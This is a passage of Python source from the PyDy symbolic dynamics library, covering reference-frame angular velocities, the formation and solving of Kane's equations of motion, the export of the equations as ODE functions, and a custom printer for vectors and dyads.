shrink(rm_list):\n new_list = []\n for i, rm in enumerate(rm_list[:-1]):\n rmn = rm_list[i+1]\n # All true if simple 
rotation about 1 axis\n cmp1 = [rm[0,0]==rmn[0,0], rm[0,1]==rmn[0,1], rm[0,2]==rmn[0,2],\n rm[1,0]==rmn[1,0], rm[2,0]==rmn[2,0]]\n # All true if simple rotation about 2 axis\n cmp2 = [rm[0,1]==rmn[0,1], rm[1,0]==rmn[1,0], rm[1,1]==rmn[1,1],\n rm[1,2]==rmn[1,2], rm[2,1]==rmn[2,1]]\n # All true if simple rotation about 3 axis\n cmp3 = [rm[0,2]==rmn[0,2], rm[1,2]==rmn[1,2], rm[2,0]==rmn[2,0],\n rm[2,1]==rmn[2,1], rm[2,2]==rmn[2,2]]\n if all(cmp1):\n # create the matrix\n break\n elif all(cmp2):\n # create the matrix\n break\n elif all(cmp3):\n # create the matrix\n break\n new_list.append(rm)\n \"\"\"\n\n frames = self.get_frames_list(frame)\n if frames == [self]:\n return [eye(3)]\n result = []\n for i, f in enumerate(frames[:-1]):\n result.append(f.transforms[frames[i+1]])\n result.reverse()\n return result\n\n def set_omega(self, omega, frame, force=False):\n \"\"\"Sets the angular velocity relative to another frame.\n \"\"\"\n if self._wrel == Vector(0) or force:\n self._wrel = omega\n #if self.W == {} or force:\n # self.W[frame] = omega\n else:\n raise ValueError(\"set_omega has already been called.\")\n\n def ang_vel(self, frame=None):\n \"\"\"Angular velocity relative to another frame.\n \"\"\"\n\n if frame == self:\n return Vector(0)\n else:\n if frame == None:\n if hasattr(self, 'abs_ang_vel'):\n return self.abs_ang_vel\n else:\n frame = self.NewtonianReferenceFrame\n elif frame == self.NewtonianReferenceFrame and hasattr(self,\n 'abs_ang_vel'):\n return self.abs_ang_vel\n\n om = Vector(0)\n fl = frame.get_frames_list(self)\n n = len(fl)\n for i, f in enumerate(fl[:-1]):\n if f == fl[i+1].parentframe:\n om += fl[i+1]._wrel\n else:\n om -= fl[i]._wrel\n return om\n\n def ang_acc(self, frame=None):\n \"\"\"Angular acceleration relative to another frame.\n \"\"\"\n\n if frame == self:\n return Vector(0)\n else:\n if frame == None: frame = self.NewtonianReferenceFrame\n if hasattr(self, 'abs_ang_acc'):\n return self.abs_ang_acc\n else:\n alpha = Vector(0)\n fl = frame.get_frames_list(self)\n n = len(fl)\n for i, f in enumerate(fl[:-1]):\n if f == fl[i+1].parentframe:\n alpha += fl[i+1]._alpharel\n else:\n alpha -= fl[i]._alpharel\n return alpha\n\n def get_omega_list(self, frame):\n \"\"\"\n Returns a list of simple angular velocities from self to frame.\n \"\"\"\n frames = self.get_frames_list(frame)\n if frames == [self]:\n return [Vector({})]\n result = []\n for i, f in enumerate(frames[:-1]):\n #result.append(f.W[frames[i+1]])\n result.append(f._wrel)\n return result\n\nclass NewtonianReferenceFrame(ReferenceFrame):\n \"\"\"A Newtonian Reference Frame class.\n\n Includes a dextral set of UnitVectors and an origin:\n\n >>> from pydy import *\n >>> N = NewtonianReferenceFrame('N')\n >>> N[1]\n n1>\n >>> N[2]\n n2>\n >>> N[3]\n n3>\n >>> N.O\n <Point NO>\n >>>\n \"\"\"\n def __init__(self, s):\n ReferenceFrame.__init__(self, s)\n # Holonomic constraint equations\n self.hc_eqns = []\n # Differentiated holonomic constraint equations\n self.dhc_eqns = []\n # Nonholonomic constraint equations\n self.nhc_eqns = []\n self.symbol_dict = {}\n self.symbol_dict_back = {}\n self.trig_func_set = set([])\n self.cos_func_set = set([])\n self.sin_func_set = set([])\n self.tan_func_set = set([])\n self.csqrd_dict = {}\n self.crossterms = set([])\n\n def setkindiffs(self, eqn_list):#, dependent_speeds=None, acc=True):\n \"\"\"Set the kinematic differential equations of the system.\n\n Must be given as a list of Relational objects.\n\n \"\"\"\n self.kindiffs = eqn_list\n\n\n def setdyndiffs(self, eqns):\n 
\"\"\"\n Sets the dynamic equations of motion.\n \"\"\"\n self.dyndiffs = eqns\n\n def recursive_subs(self, PorF, expr_dict):\n # Substitute into appropriate velocity/angular velocity\n if isinstance(PorF, Point):\n PorF._vrel = PorF._vrel.subs(expr_dict)\n elif isinstance(PorF, ReferenceFrame):\n PorF._wrel = PorF._wrel.subs(expr_dict)\n else:\n raise NotImplementedError()\n\n # Initiate recursion\n if PorF.children == []:\n return\n else:\n for child in PorF.children:\n self.recursive_subs(child, expr_dict)\n\n def recursive_partials(self, PorF):\n \"\"\"Recursively form the relative partial velocities of each point and\n partial angular velocity of each reference frame.\n \"\"\"\n # Substitute into appropriate velocity/angular velocity\n if isinstance(PorF, (Point, ReferenceFrame)):\n if isinstance(PorF, Point): pv = PorF.vel().partials(self.u_list)\n if isinstance(PorF, ReferenceFrame): pv = PorF.ang_vel().partials(self.u_list)\n if hasattr(self, 'u_dependent') and len(self.u_dependent) != 0:\n pv_i = [pv[i] for i in self.independent_ci]\n pv_d = Matrix([pv[i] for i in self.dependent_ci]).T\n # Maybe should use a dummy matrix instead of\n # u_dependent_transform... then back substitute once final\n # equations are derived.\n con = matrixv_multiply(pv_d, self.T_con).tolist()[0]\n PorF.partialv = [pv_i[i] + con[i] for i in range(len(con))]\n else:\n # Case when the system has no constraints\n PorF.partialv = pv\n else:\n raise NotImplementedError\n\n # Initiate recursion\n if PorF.children == []:\n return\n else:\n for child in PorF.children:\n self.recursive_partials(child)\n\n def declare_coords(self, string, number, list=True):\n \"\"\"Declare the generalized coordinates and their time derivatives.\n \"\"\"\n q_list, qdot_list = gcs(string, number, list)\n self.q_list = q_list\n self.qdot_list = qdot_list\n # Generate lists of Symbol objects instead of Function objects\n self.csqrd_dict = {}\n self.tan_dict = {}\n self.cot_dict = {}\n for q in q_list:\n self.csqrd_dict[cos(q)**2] = 1 - sin(q)**2\n self.tan_dict[sin(q)/cos(q)] = tan(q)\n self.cot_dict[cos(q)/sin(q)] = cot(q)\n self.q_list_s = [Symbol(str(q.func)) for q in q_list]\n sin_q_list = [sin(qs) for qs in self.q_list]\n cos_q_list = [cos(qs) for qs in self.q_list]\n tan_q_list = [tan(qs) for qs in self.q_list]\n trig_q_list = sin_q_list + cos_q_list + tan_q_list\n sin_q_list_s = [Symbol('s'+str(qs)[1:]) for qs in self.q_list_s]\n cos_q_list_s = [Symbol('c'+str(qs)[1:]) for qs in self.q_list_s]\n tan_q_list_s = [Symbol('t'+str(qs)[1:]) for qs in self.q_list_s]\n trig_q_list_s = sin_q_list_s + cos_q_list_s + tan_q_list_s\n self.qdot_list_s = [Symbol(str(q.func)+'d') for q in q_list]\n self.q_list_dict = dict(zip(q_list, self.q_list_s))\n self.q_list_dict_back = dict(zip(self.q_list_s, q_list))\n trig_q_dict = dict(zip(trig_q_list, trig_q_list_s))\n trig_q_dict_back = dict(zip(trig_q_list_s, trig_q_list))\n\n self.qdot_list_dict = dict(zip(qdot_list, self.qdot_list_s))\n self.qdot_list_dict_back = dict(zip(self.qdot_list_s, qdot_list))\n # Update the comprehensive symbol dictionaries\n for d in (self.q_list_dict, self.qdot_list_dict):\n self.symbol_dict.update(d)\n for d in (self.q_list_dict_back, self.qdot_list_dict_back):\n self.symbol_dict_back.update(d)\n self.trig_subs_dict = trig_q_dict\n self.trig_subs_dict_back = trig_q_dict_back\n return q_list, qdot_list\n\n def declare_speeds(self, string, number, lst=True):\n \"\"\"Declare the generalized speeds and their time derivatives.\n \"\"\"\n u_list, udot_list = gcs(string, 
number, lst)\n self.u_list = u_list\n self.udot_list = udot_list\n self.u_independent = u_list\n self.u_dependent = []\n self.udot_independent = udot_list\n self.udot_dedependent = []\n self.independent_ci = list(range(len(u_list)))\n self.dependent_ci = []\n\n # Generate lists of Symbol objects instead of Function objects\n self.u_list_s = [Symbol(str(u.func)) for u in u_list]\n self.udot_list_s = [Symbol(str(u.func)+'p') for u in u_list]\n\n # Generate a set of cross terms\n for ui in u_list:\n for uj in u_list:\n self.crossterms.update(set([ui*uj]))\n for qd in self.qdot_list:\n self.crossterms.update(set([ui*qd]))\n for qd_i in self.qdot_list:\n for qd_j in self.qdot_list:\n self.crossterms.update(set([qd_i*qd_j]))\n self.crossterms = list(self.crossterms)\n self.crossterms.sort()\n # Generate substitution dictionaries between Symbol and Function\n # representation of the coordinates, generalized speeds, and their\n # respective time derivatives\n self.u_list_dict = dict(zip(u_list, self.u_list_s))\n self.u_list_dict_back = dict(zip(self.u_list_s, u_list))\n self.udot_list_dict = dict(zip(udot_list, self.udot_list_s))\n self.udot_list_dict_back = dict(zip(self.udot_list_s, udot_list))\n\n for d in (self.u_list_dict, self.udot_list_dict):\n self.symbol_dict.update(d)\n for d in (self.u_list_dict_back, self.udot_list_dict_back):\n self.symbol_dict_back.update(d)\n\n return u_list, udot_list\n\n def declare_parameters(self, string):\n \"\"\"Declare the parameters (constants) of the system.\n \"\"\"\n self.parameter_list = symbols(string)\n return self.parameter_list\n\n def set_motion_constraint_matrix(self, T_con, T_con_dt, u_dep, u_indep,\n d_ci, i_ci):\n \"\"\"Set the motion constraint matrix and it's time derivative.\n\n Returns two substitution dictionaries, one for each matrix.\n \"\"\"\n m, n = T_con.shape\n assert (m, n) == T_con_dt.shape\n T_con_dict = {}\n T_con_dt_dict = {}\n T_con_sym = zeros((m, n))\n T_con_dt_sym = zeros((m, n))\n for i in range(m):\n for j in range(n):\n tconij = Symbol('T_con%d%d'%(i,j))\n tcondtij = Symbol('T_con%d%dd'%(i,j))\n T_con_dict[tconij] = T_con[i, j]\n T_con_dt_dict[tcondtij] = T_con_dt[i, j]\n T_con_sym[i, j] = tconij\n T_con_dt_sym[i, j] = tcondtij\n self.T_con = T_con_sym\n self.T_con_dt = T_con_dt_sym\n\n # Set the dependent and independent speeds\n self.u_dependent = u_dep\n self.u_independent = u_indep\n self.udot_dependent = [ud.diff(t) for ud in u_dep]\n self.udot_independent = [ui.diff(t) for ui in u_indep]\n self.dependent_ci = d_ci\n self.independent_ci = i_ci\n\n return T_con_dict, T_con_dt_dict\n\n def frstar(self, subs_dict=None):\n \"\"\"Computes the generalized inertia forces of the system.\n \"\"\"\n n = len(self.u_list)\n # p == n in systems where no dependent speeds have been introduced\n p = len(self.u_independent)\n # m == 0 in systems where no dependent speeds have been introduced\n m = len(self.u_dependent)\n self.mass_matrix = zeros((p, p))\n # When dependent speeds are used, the mass matrix must be formed\n # carefully, taking into account the transformation matrix between the\n # independent and the independent speeds:\n # M_i * d(u_i)/dt + M_d * d(u_d)/dt + ... + Fr = 0\n # M_i * d(u_i)/dt + M_d * (d(T_ud)/dt * u_i + T_ud * d(u_i)/dt) + ... + Fr = 0\n # (M_i + M_d * T_ud) * d(u_i)/dt + M_d * d(T_ud)/dt * u_i + ... 
+ Fr = 0\n if m != 0:\n self.mass_matrix_i = zeros((p, p))\n self.mass_matrix_d = zeros((p, m))\n\n self.recursive_frstar(self.O, subs_dict=subs_dict)\n self.recursive_frstar(self, subs_dict=subs_dict)\n\n def recursive_frstar(self, PorF, subs_dict=None):\n \"\"\"Recursively computes generalized inertia forces for each particle\n and rigid body in the system.\n\n Generalized inertia forces will be linear in the time derivatives of\n the generalized speeds and the gyroscopic terms of the form u_j*u_k.\n As such, when computing the generalized inertia forces it makes sense\n to collect all like terms, so that simplifications on each of the\n coefficients of these linear terms can be simplified individually.\n\n We store these coefficients as a Matrix of length: n + (n**2+n)/2.\n Where n is the number of generalized speeds (both dependent and\n independent). The (n**2 + n)/2 comes from the numer of unique possible\n gyroscopic terms. The coefficients are ordered from u1,..., un, while\n the gyroscopic terms are ordered according to the ordering of the\n \"crossterms\" attribute.\n \"\"\"\n # List of d(u_i)/dt, u_i * u_j, and u_i * qd_j terms. The acceleration\n # of every point is linear in all these terms.\n udgyro_list = self.udot_list + self.crossterms\n n = len(self.udot_list)\n m = len(self.u_dependent)\n p = len(self.u_independent)\n assert isinstance(PorF, (ReferenceFrame, Point))\n if isinstance(PorF, Point) and PorF.mass == 0:\n PorF.gen_inertia_force = [(0, 0)] * p\n elif isinstance(PorF, ReferenceFrame) and PorF.inertia.dict == {}:\n PorF.gen_inertia_force = [(0, 0)] * p\n else:\n PorF.gen_inertia_force = []\n # Compute the generalized inertia forces\n if isinstance(PorF, Point):\n acc = PorF.abs_acc\n inertia_force = {}\n for k, v in acc.dict.items():\n inertia_force[k] = -PorF.mass * v\n inertia_force = Vector(inertia_force).expandv()\n else:\n alph = PorF.ang_acc()\n I = PorF.inertia\n w = PorF.ang_vel()\n #inertia_force = (-alph.dot(I)-w.cross(I.rdot(w))).expandv()\n inertia_force = (-dot(I, alph) - cross(w, dot(I, w))).expandv()\n\n # If subs_dict was passed to form_kanes_equations, substitute it\n # here:\n if subs_dict:\n inertia_force = inertia_force.subs(subs_dict)\n # List of coefficients of all linear terms\n coef_list = inertia_force.partials(udgyro_list)\n # Loop through all partial velocities / partial angular velocites\n for i, pv in enumerate(PorF.partialv):\n sum_ud = 0\n sum_gyro = 0\n coef_list_d_pv = []\n for c in coef_list:\n coef_list_d_pv.append(c.dot(pv))\n if n == p: # Case for no motion constraints\n for j, udot in enumerate(udgyro_list[:p]):\n self.mass_matrix[i, j] += coef_list_d_pv[j]\n sum_ud += coef_list_d_pv[j] * udot\n for j, gyro in enumerate(udgyro_list[p:]):\n sum_gyro += coef_list_d_pv[j+p] * gyro\n PorF.gen_inertia_force.append((sum_ud, sum_gyro))\n else: # Case for systems with motion constraints\n mm_row = zeros((1, p+m))\n mm_i_row = zeros((1, p))\n mm_d_row = zeros((1, m))\n for j in range(p):\n mm_row[j] += coef_list_d_pv[j]\n for j, jt in enumerate(self.dependent_ci):\n mm_d_row[j] = mm_row[jt]\n for j, jt in enumerate(self.independent_ci):\n mm_i_row[j] = mm_row[jt]\n\n # Normal gyroscopic terms that appear in GIF's\n for j, gyro in enumerate(udgyro_list[p:]):\n sum_gyro += coef_list_d_pv[j+p] * gyro\n # Extra gyroscopic terms that appear in GIF's due to\n # constraints\n sum_gyro += (mm_d_row * self.T_con_dt * Matrix(self.u_independent))[0]\n\n # Mass matrix, constrained\n mm_con = mm_i_row + mm_d_row*self.T_con\n sum_ud = (mm_con * 
Matrix(self.udot_independent))[0]\n self.mass_matrix[i, :] += mm_con\n PorF.gen_inertia_force.append((sum_ud, sum_gyro))\n\n # Initiate recursion\n if PorF.children == []:\n return\n else:\n for child in PorF.children:\n self.recursive_frstar(child, subs_dict=subs_dict)\n\n def fr(self):\n \"\"\"Computes the generalized active forces of the system.\n \"\"\"\n self.recursive_fr(self.O)\n self.recursive_fr(self)\n\n def recursive_fr(self, PorF):\n \"\"\"Recursively computes generalized active forces for each particle\n and rigid body in the system.\n \"\"\"\n if isinstance(PorF, Point):\n if PorF.force == Vector(0):\n PorF.gen_active_force = [0] * len(self.u_independent)\n else:\n PorF.gen_active_force = [PorF.force.dot(pv) for pv in\n PorF.partialv]\n elif isinstance(PorF, ReferenceFrame):\n if PorF.torque == Vector(0):\n PorF.gen_active_force = [0] * len(self.u_independent)\n else:\n PorF.gen_active_force = [PorF.torque.dot(pw) for pw in\n PorF.partialv]\n else:\n raise NotImplementedError()\n\n # Initiate recursion\n if PorF.children == []:\n return\n else:\n for child in PorF.children:\n self.recursive_fr(child)\n\n def gravity(self, v):\n \"\"\"Applies a gravitational force to each particle and rigid body in the\n system.\n \"\"\"\n v = Vector(v)\n self.recursive_gravity(self.O, v)\n\n def recursive_gravity(self, Point, v):\n \"\"\"Recursively apply gravity to all points which have been assigned a\n nonzero mass.\"\"\"\n\n gf = {}\n for k in v.dict:\n gf[k] = Point.mass * v.dict[k]\n Point.force += Vector(gf)\n # Initiate recursion\n if Point.children == []:\n return\n else:\n for child in Point.children:\n self.recursive_gravity(child, v)\n\n def form_kanes_equations(self, subs_dict=None):\n \"\"\"Forms Kanes equations in a slightly modified form.\n\n Rather than returning:\n Fr + Fr* = 0\n\n It returns a list of equations which have the udot's on the left hand\n side and everything else on the opposite side.\n \"\"\"\n # Form Partial Velocities and Partial Angular velocities for every\n # Point and Reference Frame\n self.recursive_partials(self)\n self.recursive_partials(self.O)\n # Compute the generalized active forces\n self.fr()\n # Compute the generalized inertia forces\n self.frstar(subs_dict=subs_dict)\n p = len(self.u_independent)\n self.kanes_equations = []\n self.ke_lhs = [0] * p\n self.ke_rhs_if = [0] * p\n self.ke_rhs_af = [0] * p\n ke = []\n for i in range(p):\n self.kanes_equations.append([0,0])\n self.recursive_eoms(self.O)\n self.recursive_eoms(self)\n for i in range(p):\n s = S(0)\n for j, ud in enumerate(self.udot_independent):\n c_ud = self.mass_matrix[i, j]\n if c_ud != 0:\n s += c_ud * ud\n self.ke_lhs[i] = s\n s = S(0)\n for uu in self.crossterms:\n c_uu = self.ke_rhs_if[i].coeff(uu)\n if c_uu is not None:\n s += c_uu * uu\n self.ke_rhs_if[i] = s\n af = factor(self.ke_rhs_af[i].subs(self.trig_subs_dict).\\\n subs(self.symbol_dict)).subs(self.symbol_dict_back).\\\n subs(self.trig_subs_dict_back)\n ke.append(Eq(self.ke_lhs[i], self.ke_rhs_if[i] + af))\n self.kanes_equations = ke\n return ke\n\n def set_kanes_equations(self, eqns):\n self.kanes_equations = eqns\n\n def solve_kanes_equations(self, dummy_vars=None):\n \"\"\"Solves Kane's equations for the time derivatives of the generalized\n speeds.\n\n Forms the adjugate matrix, factors out common terms along the rows,\n performs the matrix multiplication, and then multiplies by the common\n terms and divides by the determinant.\n\n If optional dummy_mass_matrix argument is eqaul to True, returns the\n result with 
dummy symbols, and a dictionary with the dummy symbols as\n keys and the expression they represent as the corresponding values.\n \"\"\"\n m, n = self.mass_matrix.shape\n assert m == n\n mm, mm_dict = dummy_matrix(self.mass_matrix, 'M')\n ke_rhs, ke_dict = dummy_matrix(Matrix([ke.rhs for ke in\n self.kanes_equations]), 'rhs')\n mm_dict.update(ke_dict)\n assert ke_rhs.shape == (n, 1)\n\n # Form the adjugate and the determinant\n mm_adj = mm.adjugate().expand()\n for i in range(m):\n for j in range(n):\n if mm_adj[i, j] != 0:\n mm_adj[i, j] = factor(mm_adj[i, j])\n mm_det = factor(mm.det(method=\"berkowitz\").expand())\n assert mm_det != 0, \"Mass matrix is singular!!!\"\n\n soln = []\n # Try to factor each row\n for i in range(m):\n row = mm_adj[i,:]\n row_bool = [False] * n\n for j, entry in enumerate(row):\n if isinstance(entry, Mul) or entry == 0:\n row_bool[j] = True\n if all(row_bool): # All factored or are zero\n flag = 0\n for entry in row:\n if entry == 0:\n continue\n elif flag == 0:\n flag = 1\n row_factor = set(entry.args)\n else:\n row_factor &= set(entry.args)\n if row_factor:\n f = Mul(*list(row_factor))\n row /= f\n else:\n f = 1\n soln.append( (f / mm_det) * ((row * ke_rhs)[0]))\n else:\n soln.append( (1 / mm_det) * ((row * ke_rhs)[0]))\n\n dyndiffs = []\n for i, udot in enumerate(self.udot_independent):\n rhs = soln[i]\n if dummy_vars == None:\n rhs = rhs.subs(mm_dict).expand()\n dyndiffs.append(Eq(udot, rhs))\n\n if dummy_vars:\n return dyndiffs, mm_dict\n else:\n return dyndiffs\n\n def recursive_eoms(self, PorF):\n \"\"\"Traverse Point and ReferenceFrame tree and sum the generalized\n inertia forces and generalized active forces.\n \"\"\"\n for r in range(len(self.u_independent)):\n # Term on the left hand side of Fr* = -Fr\n self.kanes_equations[r][0] += PorF.gen_inertia_force[r][0]\n # Term on the right hand side of Fr* = -Fr\n self.kanes_equations[r][1] -= PorF.gen_active_force[r] + PorF.gen_inertia_force[r][1]\n self.ke_lhs[r] += PorF.gen_inertia_force[r][0]\n self.ke_rhs_if[r] -= PorF.gen_inertia_force[r][1]\n self.ke_rhs_af[r] -= PorF.gen_active_force[r]\n if PorF.children == []:\n return\n else:\n for child in PorF.children:\n self.recursive_eoms(child)\n\n def output_eoms(self, filename, *args):\n \"\"\"Output the equations of motion to a file as a function which can be\n integrated by scipy.odeint\n \"\"\"\n ode_func_string = '# ' + time.asctime() + '\\n'\n ode_func_string += \"from numpy import sin, cos, tan, vectorize\\n\\n\"\n ode_func_string += \"def f(x, t, parameter_list):\\n\"\n ode_func_string += ' # Unpacking the parameters\\n'\n s = \"\"\n for p in self.parameter_list:\n s += str(p) + ', '\n ode_func_string += ' ' + s[:-2] + ' = ' + 'parameter_list\\n'\n ode_func_string += ' # Unpacking the states (q\\'s and u\\'s)\\n'\n s = \"\"\n\n for q in self.q_list:\n s += str(q) + ', '\n for u in self.u_independent:\n s += str(u) + ', '\n ode_func_string += ' ' + s[:-2] + ' = ' + 'x\\n'\n\n trig_func_string = \"\"\n\n for tf in self.trig_func_set:\n trig_func_string += ' ' + str(tf) + ' = '\n if str(tf)[0] == 's':\n trig_func_string += 'sin(' + str(tf.args[0]) + ')\\n'\n if str(tf)[0] == 'c':\n trig_func_string += 'cos(' + str(tf.args[0]) + ')\\n'\n if str(tf)[0] == 't':\n trig_func_string += 'tan(' + str(tf.args[0]) + ')\\n'\n\n ode_func_string += trig_func_string\n\n dxdt_list = \"\"\n\n if hasattr(self, 'u_dependent'):\n ode_func_string += ' # Dependent generalized speeds\\n'\n for u in self.u_dependent:\n ode_func_string += ' ' + str(u) + ' = ' +\\\n 
str(self.u_dependent_eqs[u].subs(self.qdot_list_dict)) + '\\n'\n\n ode_func_string += ' # Kinematic differential equations\\n'\n qdl = []\n for qd in self.qdot_list:\n if qd in self.kindiffs: qdl.append(qd)\n\n for qd in qdl:\n ode_func_string += ' ' + str(qd)[:-1] + 'p' + ' = ' + str(self.kindiffs[qd]) + '\\n'\n dxdt_list += str(qd)[:-1] + 'p, '\n\n ode_func_string += ' # Dynamic differential equations\\n'\n\n for ud in self.udot_independent:\n ode_func_string += ' ' + str(ud)[:-1] + 'p' + ' = ' + str(self.dyndiffs[ud]) + '\\n'\n dxdt_list += str(ud)[:-1] + 'p, '\n\n ode_func_string += ' ' + 'return [' + dxdt_list[:-2] + ']'\n\n qdot2u_func_string = \"\"\n qdot2u_func_string += \"def qdot2u(q, qd, parameter_list):\\n\"\n qdot2u_func_string += ' # Unpacking the parameters\\n'\n s = \"\"\n for p in self.parameter_list:\n s += str(p) + ', '\n qdot2u_func_string += ' ' + s[:-2] + ' = ' + 'parameter_list\\n'\n qdot2u_func_string += ' # Unpacking the q\\'s and qdots\\n'\n s = \"\"\n for q in self.q_list:\n s += str(q) + ', '\n qdot2u_func_string += ' ' + s[:-2] + ' = ' + 'q\\n'\n s = \"\"\n for qd in qdl:\n s += str(qd)[:-1] + 'p, '\n qdot2u_func_string += ' ' + s[:-2] + ' = ' + 'qd\\n'\n\n trig_func_string = \"\"\n\n for tf in self.trig_func_set:\n trig_func_string += ' ' + str(tf) + ' = '\n if str(tf)[0] == 's':\n trig_func_string += 'sin(' + str(tf.args[0]) + ')\\n'\n if str(tf)[0] == 'c':\n trig_func_string += 'cos(' + str(tf.args[0]) + ')\\n'\n if str(tf)[0] == 't':\n trig_func_string += 'tan(' + str(tf.args[0]) + ')\\n'\n\n qdot2u_func_string += trig_func_string\n\n dxdt_list = \"\"\n\n qdot2u_func_string += ' # Kinematic differential equations\\n'\n if hasattr(self, 'dependent_rates'):\n qdot_i = [qd.subs(self.qdot_list_dict) for qd in qdl]\n for i, u in enumerate(self.u_list):\n qdot2u_func_string += ' ' + str(u) + ' = ' +\\\n str((self.transform_matrix[i,:]*Matrix(qdot_i))[0]) + '\\n'\n dxdt_list += str(u) + ', '\n qdot2u_func_string += ' return [' + dxdt_list[:-2] + ']'\n else:\n for i, u in enumerate(self.u_list):\n qdot2u_func_string += ' ' + str(u) + ' = ' +\\\n str((self.transform_matrix[i,:]*Matrix(self.qdot_list_s))[0]) + '\\n'\n dxdt_list += str(u) + ', '\n qdot2u_func_string += ' return [' + dxdt_list[:-2] + ']'\n\n f = open(filename, 'w')\n f.write(ode_func_string + '\\n\\n' + qdot2u_func_string)\n\n if args:\n n = len(args)\n a = \"\"\n a += \"def animate(q, parameter_list):\\n\"\n a += ' # Unpacking the parameters\\n'\n s = \"\"\n for p in self.parameter_list:\n s += str(p) + ', '\n a += ' ' + s[:-2] + ' = parameter_list\\n'\n a += ' # Unpacking the coordinates\\n'\n s = \"\"\n for q in self.q_list:\n s += str(q) + ', '\n a += ' ' + s[:-2] + ' = q\\n'\n\n trig_func_set = set([])\n a_temp = \"\"\n ret_string = \"\"\n for k, arg in enumerate(args):\n ret_string += \"[\"\n if isinstance(arg, (UnitVector, Vector)):\n pos_or_axis = [arg.dot(self[i]) for i in (1,2,3)]\n for i, p in enumerate(pos_or_axis):\n nv = \"out_%d_%d\"%(k,i)\n a_temp += \" \" + nv + \" = \" + str(p) + \"\\n\"\n ret_string += nv + \", \"\n trig_terms = p.atoms(sin, cos, tan)\n if trig_terms:\n trig_func_set.update(trig_terms)\n ret_string = ret_string[:-2] + \"], \"\n else:\n raise TypeError('Optional parameters must be Vector/UniVectors')\n\n a += \" # Trigonometric functions needed\\n\"\n trig_func_string = \"\"\n for tf in trig_func_set:\n trig_func_string += ' ' + str(tf) + ' = '\n if str(tf)[0] == 's':\n trig_func_string += 'sin(' + str(tf.args[0]) + ')\\n'\n if str(tf)[0] == 'c':\n trig_func_string += 
'cos(' + str(tf.args[0]) + ')\\n'\n if str(tf)[0] == 't':\n trig_func_string += 'tan(' + str(tf.args[0]) + ')\\n'\n a += trig_func_string\n\n a += \" # Position of Points and Axis/Angle Calculations\\n\"\n if ret_string != \"\":\n a_temp += \" return \" + ret_string[:-2]\n a += a_temp\n f.write('\\n\\n' + a)\n f.close()\n\n def define_speeds(self, eqns):\n \"\"\"Defines the generalized speeds equations, conditioning them so that\n they are more easily inverted to determined the kinematic differential\n equations.\n \"\"\"\n eqns_cond = []\n for e in eqns:\n rhs = collect(e.rhs.expand().subs(self.csqrd_dict).expand(), self.qdot_list)\n eqns_cond.append(Eq(e.lhs, rhs))\n return eqns_cond\n\n\nclass PyDyStrPrinter(StrPrinter):\n #printmethod = '_sympystr_'\n def _print_UnitVector(self, e):\n s = str(e.v['sym'])\n name = s[:-1]\n index = s[-1]\n r = \"%s%s>\" % (name, index)\n return r\n\n def _print_Vector(self, e):\n s = ''\n i = 0\n small_dot = \"*\"\n if e.dict.keys() != []:\n uv_list = e.dict.keys()\n uv_list.sort(sort_UnitVector)\n for k in uv_list:\n # Case when the scalar coefficient is 1 or -1\n if (e.dict[k] == 1) or (e.dict[k] == -1):\n # First term don't print a leading + if positive\n if i == 0:\n if e.dict[k] == 1: sign = ''\n if e.dict[k] == -1: sign = '-'\n s += sign + self.doprint(k)\n i += 1\n # All other terms put the sign and pad with spaces\n else:\n if e.dict[k] == 1: sign = '+'\n if e.dict[k] == -1: sign = '-'\n s += ' ' + sign + ' ' + self.doprint(k)\n # Case when the scalar coefficient is a Sympy expression\n else:\n # First term\n if i == 0:\n # Put parenthesis around Add terms\n if isinstance(e.dict[k], Add):\n s += ('(' + self.doprint(e.dict[k]) +\n ')' + small_dot + self.doprint(k))\n else:\n s += (self.doprint(e.dict[k]) +\n small_dot + self.doprint(k))\n i += 1\n # All subsequent terms pad with spaces and add parenthesis\n else:\n if isinstance(e.dict[k], Add):\n if e.dict[k].expand().could_extract_minus_sign():\n s += (' - (' + self.doprint(-e.dict[k].expand())\n + ')' + small_dot + self.doprint(k))\n else:\n s += (' + (' + self.doprint(e.dict[k])\n + ')' + small_dot + self.doprint(k))\n elif isinstance(e.dict[k], Mul):\n mulcoef = S(1)\n sign_counter = 0\n for arg in e.dict[k].args:\n if arg.expand().could_extract_minus_sign():\n mulcoef *= -arg.expand()\n sign_counter += 1\n else:\n mulcoef *= arg\n if sign_counter % 2 == 0:\n s += ' + ' + (self.doprint(mulcoef) + small_dot +\n self.doprint(k))\n else:\n s += ' - ' + (self.doprint(mulcoef) + small_dot +\n self.doprint(k))\n elif e.dict[k].is_negative:\n s += ' - ' + (self.doprint(-e.dict[k]) + small_dot\n + self.doprint(k))\n else:\n s += ' + ' + (self.doprint(e.dict[k]) + small_dot +\n self.doprint(k))\n return s\n else:\n return \"0>\"\n\n def _print_Function(self, e):\n \"\"\"\n Print ui(t) as ui, where is i is an index number of the generalized\n speed.\n \"\"\"\n if hasattr(e, 'is_gc'):\n return str(e.func)\n else:\n return StrPrinter().doprint(e)\n\n def _print_Symbol(self, e):\n \"\"\"\n Print ui(t) as ui, where is i is an index number of the generalized\n speed.\n \"\"\"\n if hasattr(e, 'is_gc'):\n return str(e.func)\n else:\n return StrPrinter().doprint(e)\n\n def _print_sin(self, e):\n \"\"\"\n Print sin(qi(t)) as si, where i is any number.\n \"\"\"\n if str(e.args[0].func)[0] == 'q':\n return 's' + str(e.args[0].func)[1:]\n else:\n return StrPrinter().doprint(e)\n\n def _print_cos(self, e):\n \"\"\"\n Print cos(qi(t)) as si, where i is any number.\n \"\"\"\n if str(e.args[0].func)[0] == 'q':\n 
return 'c' + str(e.args[0].func)[1:]\n else:\n return StrPrinter().doprint(e)\n\n def _print_tan(self, e):\n \"\"\"\n Print tan(qi(t)) as si, where i is any number.\n \"\"\"\n if str(e.args[0].func)[0] == 'q':\n return 't' + str(e.args[0].func)[1:]\n else:\n return StrPrinter().doprint(e)\n\n def _print_Derivative(self, expr):\n if len(expr.args) == 2:\n return str(expr.args[0].func) + \"d\"*len(expr.args[1:])\n elif len(expr.args) == 3:\n return str(expr.args[0].func) + \"d\"*len(expr.args[1:])\n else:\n return StrPrinter().doprint(expr)\n\n def _print_Dyad(self, expr):\n s = \"\"\n if expr.dict == {}:\n return \"0>>\"\n for k, v in expr.dict.items():\n if isinstance(v, Add):\n v_str = \"(\" + str(v) + \")\"\n else:\n v_str = str(v)\n if k.is_Mul:\n s += v_str + \"*\" + str(k.args[0]) + \"*\" + str(k.args[1]) + \" + \"\n elif k.is_Pow:\n s += v_str + \"*\" + str(k.args[0]) + \"*\" + str(k.args[0]) + \" + \"\n return 